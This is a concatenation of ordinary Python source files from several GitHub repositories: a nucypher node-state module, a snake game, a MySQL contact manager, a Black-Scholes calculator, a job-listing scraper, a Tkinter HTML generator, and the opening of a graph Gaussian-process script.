``quantity`` latest archived states (*not* including 
the current one),\n in chronological order.\n \"\"\"\n # `_archived_states` is never empty, one state is created in the constructor\n previous_states_num = min(len(self._archived_states) - 1, quantity)\n return list(self._archived_states)[-previous_states_num-1:-1]\n\n def addresses(self):\n return self._current_state.addresses()\n\n def record_fleet_state(self, skip_this_node: bool = False) -> StateDiff:\n new_state, diff = self._current_state.with_updated_nodes(nodes_to_add=self._nodes_to_add,\n nodes_to_remove=self._nodes_to_remove,\n skip_this_node=skip_this_node)\n\n self._nodes_to_add = set()\n self._nodes_to_remove = set()\n self._current_state = new_state\n\n # TODO: set a limit on the number of archived states?\n # Two ways to collect archived states:\n # 1. (current) add a state to the archive every time it changes\n # 2. (possible) keep a dictionary of known states\n # and bump the timestamp of a previously encountered one\n if not diff.empty():\n archived_state = new_state.archived()\n self._archived_states.append(archived_state)\n\n return diff\n\n def shuffled(self):\n return self._current_state.shuffled()\n\n def mark_as(self, label: Exception, node: \"characters.lawful.Ursula\"):\n # TODO: for now we're not using `label` in any way, so we're just ignoring it\n self._nodes_to_remove.add(node.checksum_address)\n\n def record_remote_fleet_state(self,\n checksum_address: ChecksumAddress,\n state_checksum: FleetStateChecksum,\n timestamp: maya.MayaDT,\n population: int):\n\n if checksum_address not in self._current_state:\n raise KeyError(f\"A node {checksum_address} is not present in the current fleet state\")\n\n nickname = Nickname.from_seed(bytes(state_checksum), length=1)\n state = ArchivedFleetState(checksum=state_checksum,\n nickname=nickname,\n timestamp=timestamp,\n population=population)\n\n self._remote_last_seen[checksum_address] = maya.now()\n self._remote_states[checksum_address] = state\n\n def status_info(\n self,\n checksum_address_or_node: Union[ChecksumAddress, \"characters.lawful.Ursula\"],\n ) -> \"RemoteUrsulaStatus\":\n if isinstance(checksum_address_or_node, str):\n node = self[checksum_address_or_node]\n else:\n node = checksum_address_or_node\n\n recorded_fleet_state = self._remote_states.get(node.checksum_address, None)\n last_learned_from = self._remote_last_seen.get(node.checksum_address, None)\n operator_address = node.operator_address if node.verified_node else None\n\n return RemoteUrsulaStatus(verified=node.verified_node,\n nickname=node.nickname,\n staker_address=node.checksum_address,\n operator_address=operator_address,\n rest_url=node.rest_url(),\n timestamp=node.timestamp,\n last_learned_from=last_learned_from,\n recorded_fleet_state=recorded_fleet_state,\n )\n\n\nclass RemoteUrsulaStatus(NamedTuple):\n verified: bool\n nickname: Nickname\n staker_address: ChecksumAddress\n operator_address: Optional[ChecksumAddress]\n rest_url: str\n timestamp: maya.MayaDT\n recorded_fleet_state: Optional[ArchivedFleetState]\n last_learned_from: Optional[maya.MayaDT]\n\n def to_json(self) -> Dict[str, Any]:\n if self.recorded_fleet_state is None:\n recorded_fleet_state_json = None\n else:\n recorded_fleet_state_json = self.recorded_fleet_state.to_json()\n if self.last_learned_from is None:\n last_learned_from_json = None\n else:\n last_learned_from_json = self.last_learned_from.iso8601()\n return dict(verified=self.verified,\n nickname=self.nickname.to_json(),\n staker_address=self.staker_address,\n operator_address=self.operator_address,\n 
rest_url=self.rest_url,\n                    timestamp=self.timestamp.iso8601(),\n                    recorded_fleet_state=recorded_fleet_state_json,\n                    last_learned_from=last_learned_from_json)\n","repo_name":"nucypher/nucypher","sub_path":"nucypher/acumen/perception.py","file_name":"perception.py","file_ext":"py","file_size_in_byte":15226,"program_lang":"python","lang":"en","doc_type":"code","stars":686,"dataset":"github-code","pt":"27"} +{"seq_id":"15898807062","text":"import turtle as t\n\nSTART_POS = [(0, 0), (-20, 0), (-40, 0)]\nM = 13  # distance the snake advances on each move\nRIGHT = 0\nUP = 90\nLEFT = 180\nDOWN = 270\n\n\nclass Snake:\n\n    def __init__(self):\n        self.segments = []\n        self.create_snake()\n        self.head = self.segments[0]\n        self.head.shape(\"circle\")\n        self.head.color(\"red\")\n\n    def create_snake(self):\n\n        for position in START_POS:\n            self.add_segment(position)\n\n    def add_segment(self, position):\n        new_snake = t.Turtle()\n        new_snake.shape(\"circle\")\n        new_snake.color(\"white\")\n        new_snake.shapesize(1.2)\n        new_snake.penup()\n        new_snake.goto(position)\n        self.segments.append(new_snake)\n\n    def reset_snake(self):\n        for i in self.segments:\n            i.goto(1000, 1000)\n        self.segments.clear()\n        self.create_snake()\n        self.head = self.segments[0]\n        self.head.shape(\"circle\")\n        self.head.color(\"red\")\n\n    def extend(self):\n        self.add_segment(self.segments[-1].position())\n\n    def move(self):\n        for seg in range(len(self.segments) - 1, 0, -1):\n            new_x = self.segments[seg - 1].xcor()\n            new_y = self.segments[seg - 1].ycor()\n            self.segments[seg].goto(new_x, new_y)\n        self.segments[0].forward(M)\n\n    def up(self):\n        if self.head.heading() != DOWN:\n            self.head.setheading(UP)\n\n    def down(self):\n        if self.head.heading() != UP:\n            self.head.setheading(DOWN)\n\n    def right(self):\n        if self.head.heading() != LEFT:\n            self.head.setheading(RIGHT)\n\n    def left(self):\n        if self.head.heading() != RIGHT:\n            self.head.setheading(LEFT)\n","repo_name":"polonium31/Python_Projects","sub_path":"APP/Game/snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41927432752","text":"import mysql.connector\nimport re\nimport tkinter as tk\nfrom tkinter import messagebox\n\ncompleted = False\n\n\ndef connection(database=None):\n    return mysql.connector.connect(\n        host=\"localhost\",\n        user=\"root\",\n        password=\"R+D@11\",\n        database=database,\n        auth_plugin=\"mysql_native_password\",\n    )\n\n\ndef create_db():\n    db = connection()\n    try:\n        cur = db.cursor()\n        sql = \"CREATE DATABASE contact_list;\"\n\n        cur.execute(sql)\n\n        print(\"The DB has been successfully created! :)\")\n    except:\n        print()\n\n\n
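# NOTE: the bare except above deliberately swallows \"database already exists\"\n# errors so create_db() is safe to run on every startup; create_table() below\n# follows the same pattern\n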
:)\")\n except:\n print()\n\n\ndef add_contact(parent, data):\n global completed\n\n db = connection(\"contact_list\")\n cur = db.cursor()\n sql = \"\"\"\n INSERT INTO contact (first_name, last_name, country_code, phone, \n phone_category, email, street, house_number, city, province, country) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\n \"\"\"\n invalid = get_invalid_data(data)\n\n if data[0]:\n if not contact_exists(data[0], data[1]):\n if invalid:\n messagebox.showerror(\n \"Invalid Values\",\n \"The following fields have invalid values: \"\n + \", \".join(invalid)\n + \".\",\n )\n\n completed = False\n else:\n cur.execute(sql, data)\n db.commit()\n\n parent.show_contacts()\n\n if data[0] in (\"Ramón\", \"Ramon\", \"ramón\", \"ramon\") and data[1] in (\n \"Vásquez\",\n \"Vasquez\",\n \"vásquez\",\n \"vasquez\",\n ):\n messagebox.showinfo(\n \"Thanks!\",\n \"Thank you for adding me! You can contact me for tech support! :D\",\n )\n else:\n messagebox.showinfo(\n \"Contact Created\",\n \"%s%s%s has been successfully added!\"\n % (data[0], \" \" if data[1] else \"\", data[1]),\n )\n\n completed = True\n else:\n messagebox.showwarning(\n \"Existing Contact\",\n \"%s%s%s is already a contact!\"\n % (data[0], \" \" if data[1] else \"\", data[1]),\n )\n\n completed = False\n else:\n messagebox.showerror(\"Name Required\", \"You can't create a nameless contact!\")\n\n completed = False\n\n db.close()\n\n\ndef update_contact(parent, data, id):\n global completed\n data.append(id)\n\n db = connection(\"contact_list\")\n cur = db.cursor()\n sql = \"\"\"\n UPDATE contact SET first_name = %s, last_name = %s, country_code = %s, \n phone = %s, phone_category = %s, email = %s, street = %s, house_number = %s, \n city = %s, province = %s, country = %s WHERE id = %s;\n \"\"\"\n invalid = get_invalid_data(data)\n\n if data[0]:\n if invalid:\n messagebox.showerror(\n \"Invalid Values\",\n \"The following fields have invalid values: \" + \", \".join(invalid) + \".\",\n )\n\n completed = False\n else:\n cur.execute(sql, data)\n db.commit()\n\n parent.show_contacts()\n\n messagebox.showinfo(\n \"Contact Updated\",\n \"%s%s%s's data has been updated!\"\n % (data[0], \" \" if data[1] else \"\", data[1]),\n )\n\n completed = True\n\n parent.btn_update.destroy()\n\n parent.btn_add = tk.Button(\n parent.frm_buttons,\n text=\"Add\",\n width=30,\n height=1,\n command=lambda: [\n add_contact(parent, parent.get_contact_data()),\n parent.reset_form() if completed else \"\",\n ],\n )\n parent.btn_add.grid(row=0, column=0, padx=5, pady=5, sticky=tk.S)\n\n parent.frm_form[\"text\"] = \"Add Contact\"\n else:\n messagebox.showerror(\"Name Required\", \"You can't update a nameless contact!\")\n\n db.close()\n\n\ndef delete_contact(parent, treeview):\n # Sets the instructin to delete the selected contact\n db = connection(\"contact_list\")\n cur = db.cursor()\n sql_1 = \"DELETE FROM contact WHERE id = %s;\"\n id = treeview.focus()\n dato = (id,)\n\n # Gets first and last names to fill the messagebox\n sql_2 = \"SELECT first_name, last_name FROM contact WHERE id = %s; \"\n cur.execute(sql_2, dato)\n res = cur.fetchall()\n first = res[0][0]\n last = res[0][1]\n\n answer = messagebox.askyesno(\n \"Delete Contact\",\n \"Are you sure you want to delete %s%s%s?\" % (first, \" \" if last else \"\", last),\n )\n\n if answer:\n if first in (\"Ramón\", \"Ramon\", \"ramón\", \"ramon\") and last in (\n \"Vásquez\",\n \"Vasquez\",\n \"vásquez\",\n \"vasquez\",\n ):\n messagebox.showinfo(\":(\", \"Oh, that's such a pity! Bye! 
:(\")\n cur.execute(sql_1, dato)\n db.commit()\n parent.show_contacts()\n\n db.close()\n\n\ndef search_contact(**kwargs):\n db = connection(\"contact_list\")\n data = ()\n sql = \"\"\n\n cur = db.cursor()\n\n for key in kwargs:\n if key == \"first_name\" or key == \"last_name\":\n if isinstance(kwargs[\"first_name\"], tuple) or isinstance(\n kwargs[\"last_name\"], tuple\n ):\n if kwargs[\"first_name\"] != (\"\",) and kwargs[\"last_name\"] == (\"\",):\n sql = \"SELECT * FROM contact WHERE first_name = %s;\"\n data = (kwargs[\"first_name\"][0],)\n elif kwargs[\"first_name\"] == (\"\",) and kwargs[\"last_name\"] != (\"\",):\n sql = \"SELECT * FROM contact WHERE last_name = %s;\"\n data = (kwargs[\"last_name\"][0],)\n elif kwargs[\"first_name\"] != (\"\",) and kwargs[\"last_name\"] != (\"\",):\n sql = \"SELECT * FROM contact WHERE first_name = %s AND last_name = %s;\"\n data = (kwargs[\"first_name\"][0], kwargs[\"last_name\"][0])\n else:\n sql = \"SELECT * FROM contact WHERE first_name = %s AND last_name = %s;\"\n data = (kwargs[\"first_name\"], kwargs[\"last_name\"])\n elif key == \"id\":\n sql = \"SELECT * FROM contact WHERE id = %s\"\n data = (kwargs[\"id\"],)\n\n cur.execute(sql, data)\n res = cur.fetchall()\n\n db.close()\n\n return res\n\n\ndef get_invalid_data(data):\n invalid = []\n\n if is_invalid_text(data[0]):\n invalid.append(\"first name\")\n if is_invalid_text(data[1]):\n invalid.append(\"last name\")\n if data[5] and not is_valid_email(data[5]):\n invalid.append(\"email\")\n if is_invalid_number(data[3]):\n invalid.append(\"phone\")\n if is_invalid_alphanumeric(data[8]):\n invalid.append(\"city\")\n if is_invalid_alphanumeric(data[6]):\n invalid.append(\"street\")\n if is_invalid_number(data[7]):\n invalid.append(\"house number\")\n\n return invalid\n\n\ndef contact_exists(first_name, last_name):\n return search_contact(first_name=first_name, last_name=last_name)\n\n\ndef is_invalid_text(data):\n return re.search(r\"[^A-Za-zÁáÉéÍíÓóÚú \\'\\.-]+\", data)\n\n\ndef is_valid_email(data):\n return re.search(r\"([A-Za-z0-9_\\.]+@[A-Za-z0-9_]+(?:\\.[a-z]+)+)\", data)\n\n\ndef is_invalid_number(data):\n return re.search(r\"[^0-9]+\", data)\n\n\ndef is_invalid_alphanumeric(data):\n return re.search(r\"[^A-Za-z0-9ÁáÉéÍíÓóÚú \\'\\.-]+\", data)\n","repo_name":"ramonfvasquez/contact_list_python","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":8411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19550708107","text":"import numpy as np\r\nimport math\r\nimport scipy.stats as st\r\n\r\ndef blackScholes(s, x, t, r, v, divType = '', dividends = {}, prnt = True):\r\n \"\"\"\r\n Function that values options using the Black-Scholes model\r\n ----------\r\n s : The current spot price of the underlying asset\r\n x : The strike price of the option contract\r\n t : The time to maturity of the option contract\r\n r : The risk-free rate over the life of the option\r\n v : The volatility of the underlying assets price\r\n \r\n Optional:\r\n divType : '' for no dividends (default), 'D' for discrete, 'C' for continuous\r\n dividends : {amount1: time1, amount2: time2} for discrete dividends, percentage for continuous dividend yield\r\n prnt : True to print option price to console (default), False to disable\r\n \r\n Returns\r\n -------\r\n Call Price, Put Price\r\n \"\"\"\r\n #Discrete Dividends and No Dividends\r\n if divType in ['D', '']:\r\n d = 0\r\n for value in dividends:\r\n d += value * math.exp(-r * 
dividends[value]) \r\n d1 = (np.log((s - d)/ x) + (r + 0.5 * v ** 2) * t) / (v * math.sqrt(t))\r\n d2 = d1 - v * math.sqrt(t)\r\n nd1, nd2 = st.norm.cdf(d1), st.norm.cdf(d2)\r\n c = max((s - d) * nd1 - x * math.exp(-r * t) * nd2, 0)\r\n p = max(c - (s - d) + x * math.exp(-r * t), 0) #Put-Call Parity\r\n \r\n #Continuous Dividends\r\n elif divType == 'C':\r\n d1 = (np.log(s/ x) + (r - dividends + 0.5 * v ** 2) * t) / (v * math.sqrt(t))\r\n d2 = d1 - v * math.sqrt(t)\r\n nd1, nd2 = st.norm.cdf(d1), st.norm.cdf(d2)\r\n c = max((s) * math.exp(-dividends * t) * nd1 - x * math.exp(-r * t) * nd2, 0)\r\n p = max(c - (s) * math.exp(-dividends * t) + x * math.exp(-r * t), 0) #Put-Call Parity \r\n \r\n if prnt:\r\n print(f\"\"\"The fair price of the call option is ${round(c, 4)}.\r\nThe fair price of the put option is ${round(p, 4)}\"\"\")\r\n return c, p\r\n\r\n#Example Inputs\r\n#No Dividends, $100 share price, $90 strike price, 9 month maturity\r\n#8% risk free rate, 25% share price volatility\r\nprint('*** No Dividends ***')\r\nblackScholes(100, 90, 0.75, 0.08, 0.25)\r\n\r\n#Discrete Dividends, $1 dividend in month 1 and $1.50 dividend in month 7\r\nprint('\\n*** Discrete Dividends ***')\r\nblackScholes(100, 90, 0.75, 0.08, 0.25, 'D', {1: 1/12, 1.50: 7/12})\r\n\r\n#Continuous Dividend Yield, 4% annually\r\nprint('\\n*** Continuous Dividends ***')\r\nblackScholes(100, 90, 0.75, 0.08, 0.25, 'C', 0.04)","repo_name":"sammuharem/blackscholes-option-valuation-calculator","sub_path":"Black Scholes Option Valuation Calculator.py","file_name":"Black Scholes Option Valuation Calculator.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30091004963","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom selenium import webdriver\nfrom lxml import etree\nfrom multiprocessing import Queue, Manager\nfrom concurrent.futures import ThreadPoolExecutor\nfrom gevent.pool import Pool\n# import gevent\n# from gevent.queue import Queue\nimport time\n\nimport pymysql\n\n\ndef get_meg_dict(content, result_list):\n print(len(content))\n tree = etree.HTML(content)\n\n trs = tree.xpath('//table[@class=\"tablelist\"]/tbody/tr')[1:-1]\n\n for tr in trs:\n job = tr.xpath('.//a/text()')[0].strip()\n area = tr.xpath('.//td[4]/text()')[0].strip()\n typ = tr.xpath('.//td[2]/text()')[0].strip()\n # print(area, types)\n meg_dict = {\n 'job': job,\n 'area': area,\n 'typ': str(typ),\n }\n print(meg_dict)\n result_list.append(meg_dict)\n id = tree.xpath('//a[@id=\"next\"]/@href')[0]\n if 'javascript' in id:\n return None\n return 1\n\n\ndef save_to_sql(meg_dict):\n # print('save %s start' % meg_dict['job'], meg_dict['area'], meg_dict['typ'])\n conn = pymysql.connect(\n host='localhost',\n user='root',\n password='xzx199110',\n database='bs',\n port=3306,\n )\n cursor = conn.cursor()\n sql = \"\"\"\n insert into tencent_test (job, area, typ) values (%s, %s, %s)\"\"\"\n try:\n cursor.execute(\n sql, (meg_dict['job'], meg_dict['area'], meg_dict['typ']))\n conn.commit()\n except TypeError as e:\n print(e)\n except Exception as e:\n print(e)\n finally:\n conn.close()\n # print('save %s end' % meg_dict['job'])\n\n\ndef get_all_meg(url, result_list):\n browser = webdriver.Chrome()\n browser.get(url)\n\n content = browser.page_source\n\n get_meg_dict(content, result_list)\n\n try:\n while True:\n browser.find_element_by_id('next').click()\n content = browser.page_source\n meg_dict = get_meg_dict(content, result_list)\n 
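# get_meg_dict returns None once the \"next\" link turns into a javascript\n            # stub; the code below raises to break the loop and close the browser\n            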
print(meg_dict)\n if meg_dict is None:\n raise Exception\n except Exception:\n browser.close()\n\n\n# def create_result_list(queue_result, result_list):\n# while not queue_result.empty():\n# result_list.append(queue_result.get())\n# return result_list\n\n\nif __name__ == '__main__':\n result_list = Manager().list()\n pool = Pool(size=15)\n url_list = ['https://job.tencent.com/position.php?keywords=&lid=0&tid=8%d' %\n num for num in range(1, 8, 1)]\n\n with ThreadPoolExecutor(max_workers=8) as executor:\n for url in url_list:\n executor.submit(get_all_meg, url, result_list)\n # executor.submit(create_result_list, queue_result, result_list)\n\n # gevent.joinall([gevent.spawn(get_all_meg, url, queue_result) for url in url_list])\n\n print(len(result_list))\n print('start saving')\n pool.map(save_to_sql, result_list)\n # with ThreadPoolExecutor(max_workers=8) as executor:\n # executor.map(save_to_sql, result_list)\n print('saving success')\n","repo_name":"pipoted/bs","sub_path":"spider/tencent_spider/tencent_version1.py","file_name":"tencent_version1.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6779752979","text":"'''\r\nCopyright Lucas Percereau -> lucas.percereau@gmail.com\r\n'''\r\n\r\n'''Imports'''\r\nfrom functools import partial\r\nfrom tkinter import *\r\nfrom PIL import Image, ImageTk\r\n\r\n'''Variables'''\r\nindex = 2\r\n\r\nelement = []\r\ntype = []\r\n''''''\r\n\r\n'''FONCTIONS'''\r\ndef generateHTML():\r\n str = \"\"\r\n for i in range(len(element)):\r\n if type[i] == \"P\":\r\n str += \"
<p>\"+element[i].get(\"1.0\",'end-1c')+\"</p>\"+'\\n'\r\n        if type[i] == \"S\":\r\n            str += \"<p>Sitographie : test</p>\"+'\\n'\r\n        if type[i] == \"H2\":\r\n            str += \"<h2>\" + element[i].get(\"1.0\", 'end-1c') + \"</h2>\"+'\\n'\r\n        if type[i] == \"H4\":\r\n            str += \"<h4>\" + element[i].get(\"1.0\", 'end-1c') + \"</h4>\"+'\\n'\r\n        if type[i] == \"H6\":\r\n            str += \"<h6>\" + element[i].get(\"1.0\", 'end-1c') + \"</h6>\"+'\\n'\r\n        if type[i] == \"Sign\":\r\n            str += \"<p>-- \"+element[i].get(\"1.0\", 'end-1c')+\"</p>\"+'\\n'\r\n        
\"+'\\n'\r\n if type[i] == \"image\":\r\n strFull = element[i].get(\"1.0\", 'end-1c').split(\"%\")\r\n str += \"\\\"\"+strFull[1]+\"\\\"\"+'\\n'\r\n if type[i] == \"legende\":\r\n str += \"
\"+element[i].get(\"1.0\", 'end-1c')+\"
\"+'\\n'\r\n if type[i] == \"hrow\":\r\n str += \"


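# typical flow: each +button below appends a Text widget to element[] and its\r\n# kind to type[]; Generate then serializes them in order into articleGenerated.html\r\n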
\"+'\\n'\r\n\r\n f = open(\"articleGenerated.html\", \"w\")\r\n f.write(str)\r\n f.close()\r\n\r\ndef addParagraphe():\r\n global index\r\n text = Text(frame, height=10, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n type.append(\"P\")\r\n label = Label(frame, text='Paragraphe : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addSitographie():\r\n global index\r\n text = Text(frame, height=5, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n type.append(\"S\")\r\n label = Label(frame, text='Sitographie : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addH2():\r\n global index\r\n text = Text(frame, height=1, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n type.append(\"H2\")\r\n label = Label(frame, text='Titre H2 : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addH4():\r\n global index\r\n text = Text(frame, height=1, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n type.append(\"H4\")\r\n label = Label(frame, text='Titre H4 : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addH6():\r\n global index\r\n text = Text(frame, height=1, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n type.append(\"H6\")\r\n label = Label(frame, text='Titre H6 : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addSignature():\r\n global index\r\n text = Text(frame, height=1, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n type.append(\"Sign\")\r\n label = Label(frame, text='Signature : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addHrow():\r\n global index\r\n text = Text(frame, height=1, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n text.insert(1.0, \"NOTHING TO WRITE HERE, JUST AN HORIZONTAL ROW :D !\")\r\n element.append(text)\r\n type.append(\"Sign\")\r\n label = Label(frame, text='H row : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addImageSimple():\r\n global index\r\n text = Text(frame, height=1, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n text.insert(1.0, \"nom_image%description_image\")\r\n element.append(text)\r\n type.append(\"image\")\r\n label = Label(frame, text='Image path : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addLegende():\r\n global index\r\n text = Text(frame, height=1, width=150, padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n 
type.append(\"legende\")\r\n label = Label(frame, text='Legende : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index, rowspan=3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef replaceButton():\r\n global index\r\n buttonH2.grid(column=2, row=index)\r\n buttonH4.grid(column=2, row=index + 1)\r\n buttonSitographie.grid(column=2, row=index + 2)\r\n buttonH6.grid(column=3, row=index)\r\n buttonParagraphe.grid(column=3, row=index + 1)\r\n buttonSignature.grid(column=3, row=index + 2)\r\n buttonGenerate.grid(column=1, row=index + 1)\r\n buttonImage.grid(column=2, row=index+3)\r\n buttonLegende.grid(column=3, row=index+3)\r\n buttonHrow.grid(column=2, row=index+4)\r\n updateScrollRegion()\r\n\r\ndef updateScrollRegion():\r\n canvas.update_idletasks()\r\n canvas.config(scrollregion=frame.bbox())\r\n canvas.yview_moveto(1)\r\n\r\ndef mouse_wheel(event):\r\n direction = 0\r\n if event.num == 5 or event.delta == -120:\r\n direction = 1\r\n if event.num == 4 or event.delta == 120:\r\n direction = -1\r\n canvas.yview_scroll(direction, UNITS)\r\n\r\ndef clearTextBox(event):\r\n numeroEdition.delete('1.0', END)\r\n numeroEdition.unbind(\"\")\r\n\r\n'''CREATION FENETRE'''\r\nroot = Tk()\r\nroot.title(\"HTML GENERATOR\")\r\nroot.geometry(\"1600x900\")\r\nroot.bind(\"\", mouse_wheel)\r\nroot.bind('', mouse_wheel)\r\nroot.bind('', mouse_wheel)\r\n''''''\r\n\r\n'''FRAME AND CANVAS FOR SCROLLING'''\r\ncanvas = Canvas(root)\r\nframe = Frame(canvas)\r\ncanvas.configure(bg='#004875')\r\nframe.configure(bg='#004875')\r\nscrollbar = Scrollbar(root)\r\n\r\ncanvas.config(yscrollcommand=scrollbar.set, highlightthickness=0)\r\ncanvas.configure(yscrollincrement='30')\r\nscrollbar.config(orient=VERTICAL, command=canvas.yview)\r\nscrollbar.pack(fill=Y, side=RIGHT, expand=FALSE)\r\ncanvas.pack(fill=BOTH, side=LEFT, expand=TRUE)\r\ncanvas.create_window(0, 0, window=frame, anchor=NW)\r\n''''''\r\n\r\n'''WIDGET'''\r\nlabelTitle = Label(frame, text='HTML GENERATOR',pady=10,padx=30)\r\nlabelTitle.configure(bg='#E8927C')\r\n\r\nnumeroEdition = Text(frame, height=1, width=10,padx=\"5\", pady=\"5\")\r\nnumeroEdition.insert(1.0,\"Edition N°\")\r\nnumeroEdition.bind(\"\", clearTextBox)\r\n\r\n\r\nload = Image.open(\"logoMedium.png\")\r\nrender = ImageTk.PhotoImage(load)\r\nimg = Label(frame, image=render)\r\nimg.configure(bg='#004875')\r\nimg.image = render\r\n\r\nload2 = Image.open(\"logoPolytechMedium.png\")\r\nrender2 = ImageTk.PhotoImage(load2)\r\nimg2 = Label(frame, image=render2)\r\nimg2.configure(bg='#004875')\r\nimg2.image = render2\r\n\r\nbuttonH2 = Button(frame, text='+Titre H2', command=partial(addH2))\r\nbuttonH2.configure(bg='#E8927C')\r\nbuttonH4 = Button(frame, text='+Titre H4', command=partial(addH4))\r\nbuttonH4.configure(bg='#E8927C')\r\nbuttonH6 = Button(frame, text='+Titre H6', command=partial(addH6))\r\nbuttonH6.configure(bg='#E8927C')\r\nbuttonParagraphe = Button(frame, text='+Paragraphe', command=partial(addParagraphe))\r\nbuttonParagraphe.configure(bg='#E8927C')\r\nbuttonSitographie = Button(frame, text='+Sitographie', command=partial(addSitographie))\r\nbuttonSitographie.configure(bg='#E8927C')\r\nbuttonSignature = Button(frame, text='+Signature',command=partial(addSignature))\r\nbuttonSignature.configure(bg='#E8927C')\r\nbuttonImage = Button(frame, text='+Image simple',command=partial(addImageSimple))\r\nbuttonImage.configure(bg='#E8927C')\r\nbuttonLegende = Button(frame, 
text='+Legende',command=partial(addLegende))\r\nbuttonLegende.configure(bg='#E8927C')\r\nbuttonHrow= Button(frame, text='+H row',command=partial(addHrow))\r\nbuttonHrow.configure(bg='#E8927C')\r\n\r\nbuttonGenerate = Button(frame, text='Generate', command=partial(generateHTML),padx=50)\r\nbuttonGenerate.configure(bg='#E8927C')\r\n''''''\r\n\r\n'''Grid'''\r\nlabelTitle.grid(column=1, row=0)\r\n\r\nnumeroEdition.grid(column=1, row=1)\r\n\r\nimg.grid(column=0, row=0,rowspan =2)\r\nimg2.grid(column=2, row=0,columnspan =2,rowspan =2)\r\n\r\nbuttonH2.grid(column=1, row=2)\r\nbuttonH4.grid(column=1, row=3)\r\nbuttonH6.grid(column=1, row=4)\r\nbuttonParagraphe.grid(column=1, row=5)\r\nbuttonSitographie.grid(column=1, row=6)\r\nbuttonSignature.grid(column=1, row=7)\r\nbuttonImage.grid(column=1, row=8)\r\nbuttonLegende.grid(column=1, row=9)\r\nbuttonHrow.grid(column=1, row=10)\r\n\r\nbuttonGenerate.grid(column=1, row=11)\r\n\r\nroot.mainloop()\r\n''''''\r\n","repo_name":"LucasPercereau/HTML_Generator","sub_path":"HTMLgenerator.py","file_name":"HTMLgenerator.py","file_ext":"py","file_size_in_byte":9337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19955410634","text":"import numpy as np\r\nimport scipy as sp\r\nimport tensorflow as tf\r\nimport torch\r\nfrom torch_geometric import datasets\r\nimport matplotlib.pyplot as plt\r\nimport gpflow\r\nfrom gpflow.utilities import print_summary\r\n\r\nimport argparse\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--data\", default='Cora', type=str, help=\"Cora, Citeseer, Texas, Wisconsin, Cornell, Chameleon, Squirrel, Actor\")\r\nparser.add_argument(\"--base_kernel\", default='Polynomial', type=str, help=\"Polynomial, Matern52, Matern32, Matern12, SquaredPolynomial\")\r\nparser.add_argument(\"--epoch\", default=200, type=int, help=\"number of epochs\")\r\nparser.add_argument(\"--lr\", default=0.1, type=float, help=\"adam learn rate\")\r\nparser.add_argument('--approx', type=bool, default=False, help='default is exact kernel, True for chebyshev approximation')\r\nparser.add_argument('--approx_deg', type=int, default=7, help='degree of chebyshev approximation, only used when --approx=True')\r\nparser.add_argument('--train_on_val', type=bool, default=False, help='if True, validation set is included in the training')\r\nparser.add_argument('--split', type=int, default=0, help='data split if there are multiple')\r\nparser.add_argument('--act', type=str, default='relu', help='relu, tanh')\r\n\r\nparser = parser.parse_args()\r\n\r\ndataset_name = parser.data\r\ndataset_path = f'data/'\r\nif dataset_name in [\"Cora\", \"Citeseer\", \"PubMed\"]:\r\n dataset = datasets.Planetoid(dataset_path, dataset_name)\r\nelif dataset_name in [\"Computers\", 